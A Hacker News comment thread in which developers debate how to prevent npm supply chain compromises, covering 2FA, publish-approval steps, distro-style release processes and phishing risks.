| ▲ | 0xbadcafebee 4 days ago |
| Here we are again. 12 days ago (https://news.ycombinator.com/item?id=45039764) I commented how a similar compromise of Nx was totally preventable. Again, this is not the failure of a single person. This is a failure of the software industry. Supply chain attacks have gigantic impacts. Yet these are all solved problems. Somebody has to just implement the standard security measures that prevents these compromises. We're software developers... we're the ones to implement them. Every software packaging platform on the planet should already require code signing, artifact signing, user account attacker access detection heuristics, 2FA, etc. If they don't, it's not because they can't, it's because nobody has forced them to. These attacks will not stop. With AI (and continuous proof that they work) they will now get worse. Mandate software building codes now. |
|
| ▲ | TheJoeMan 4 days ago | parent | next [-] |
| For a package with thousands of downloads a week, does the publishing pace need to be so fast? New version could be uploaded to NPM, then perhaps a notification email to the maintainer saying it will go live on XX date and click here to cancel? |
| |
| ▲ | 0xbadcafebee 4 days ago | parent [-] | | A standard release process for Linux distro packages is 1) submitting a new revision, 2) having it approved by a repository maintainer, 3) it cooks a while in unstable, 4) then in testing, and finally 5) is released as stable. So there's an approval process, a testing phase, and finally a release. And since it's impossible for people to upload a brand new package into a package repository without this process, typosquatting never happens. Sadly, programming language package managers have normalized the idea that everyone who uses the package manager should be exposed to every random package and release from random strangers with no moderation. This would be unthinkable for a Linux distribution. (You can of course add 3rd-party Linux package repositories, unstable release branches, etc, which should enforce the same type of rules, but they don't have to) Linux distros are still vulnerable to supply chain attacks though. It's very rare but it has happened. So regardless of the release process, you need all the other mitigations to secure the supply chain. And once they're set up it's all pretty automatic and easy (I use them all day at work). | | |
| ▲ | bbarnett 3 days ago | parent | next [-] | | It's a problem solved decades ago, as you say. Devs, not caring about security or trust, just found it inconvenient. This will probably be reigned in soon. Many companies I know are backing away from npm/node, and even composer. It's just too risky an ecosystem. | |
| ▲ | papyrus9244 3 days ago | parent | prev [-] | | And for any Arch users reading this, AUR is the wild west too. |
|
|
|
| ▲ | const_cast 4 days ago | parent | prev | next [-] |
| A lot of these security measures have trade offs, particularly when we start looking at heuristics or attestation-like controls. These can exclude a lot of common systems and software, including automations. If your heuristic is quite naive like "is using Linux" or "is using Firefox" or "has an IP not in the US" you run into huge issues. These sound stupid, because they are, but they're actually pretty common across a lot of software. Similar thing with 2FA. Sms isn't very secure, email primes you to phishing, TOTP is good... but it needs to be open standard otherwise we're just doing the "exclude users" thing again. TOTP is still phishable, though. Only hardware attestation isn't, but that's a huge red flag and I don't think NPM could do that. |
| |
| ▲ | rtpg 4 days ago | parent [-] | | I have a hard time arguing that 2FA isn't a massive win in almost every circumstance. Having a "confirm that you have uploaded a new package" thing as the default seems good! Someone like npm mandating that a human being presses a button with a recaptcha for any package downloaded by more than X times per week just feels almost mandatory at this point. The attacks are still possible, but they're not going to be nearly as easy here. | | |
| ▲ | SchemaLoad 3 days ago | parent [-] | | 2FA is a huge benefit over plain passwords. But it wasn't enough here. The package dev had 2FA and it did not help since they got tricked in to logging in to a phishing page which proxied the 2FA code to the real login page. | | |
| ▲ | bbarnett 3 days ago | parent [-] | | Yet the parent said for each upload prior to publish. This attack would have 100% been thwarted, when a load of emails appeared saying "publish package you just uploaded?". (if you read the dev's account of this, you'll see this would have worked) | | |
| ▲ | mnahkies 3 days ago | parent | next [-] | | Another advantage of this would be for CI/CD - MFA can be a pain for this. If I could have a publish token / oidc Auth in CI that required an additional manual approve in the web UI before it was actually published I could imagine this working well. It would help reduce risk from CI system breaches as well. There are already "package published" notification emails, it's just at that point it's too late. | | |
| ▲ | const_cast 3 days ago | parent [-] | | Yes, exactly. A lot of these 2FA schemes or attestation schemes break automation, which is really undesirable in this particular scenario. Its tricky. |
| |
| ▲ | hvb2 3 days ago | parent | prev [-] | | Assuming you've compromised said developers account, wouldn't you be able to click that publish button too? |
|
|
|
|
|
| ▲ | ropable 3 days ago | parent | prev | next [-] |
| > Somebody has to just implement the standard security measures that prevents these compromises. I don't disagree, but this sentence is doing a lot of heavy lifting. See also "draw the rest of the owl". |
| |
| ▲ | sussmannbaka 3 days ago | parent | next [-] | | We are engineers. Much like an artist could draw the rest of the owl, it’s not an unreasonable ask towards a field that each day seems to grow more accustomed to the learned helplessness. | |
| ▲ | giveita 3 days ago | parent | prev [-] | | Part of the owl can be how consumers upgrade. Don't get the latest patches but keep things up to date. Secondary sources of information about good versions to upgrade to and when. Allows time for vulns to be discovered like this before upgrading. Assumption is people can detect vulns before mass of people installing, which I think is true. Then you just need exceptions for critical security fixes. |
|
|
| ▲ | imiric 4 days ago | parent | prev | next [-] |
| > Somebody has to just implement the standard security measures that prevents these compromises. It's not that simple. You can implement the most stringent security measures, and ultimately a human error will compromise the system. A secure system doesn't exist because humans are the weakest link. So while we can probably improve some of the processes within npm, phishing attacks like the ones used in this case will always be a vulnerability. You're right that AI tools will make these attacks more common. That phishing email was indistinguishable from the real thing. But AI tools can also be used to scan and detect such sophisticated attacks. We can't expect to fight bad actors with superhuman tools at their disposal without using superhuman tools ourselves. Fighting fire with fire is the only reasonable strategy. |
|
| ▲ | zestyping 3 days ago | parent | prev | next [-] |
| Interesting. According to https://www.wiz.io/blog/s1ngularity-supply-chain-attack the initial entry point was a "flawed GitHub Actions workflow that allowed code injection through unsanitized pull request titles" — which was detected and mitigated on August 29. That was more than ten days ago, and yet major packages were compromised yesterday. How? |
|
| ▲ | ivape 4 days ago | parent | prev [-] |
| People focus on attacking windows because there are more windows users. What if I told you the world now has a lot more people involved in programming with JavaScript and Python? You’re right, this will only get a lot worse. |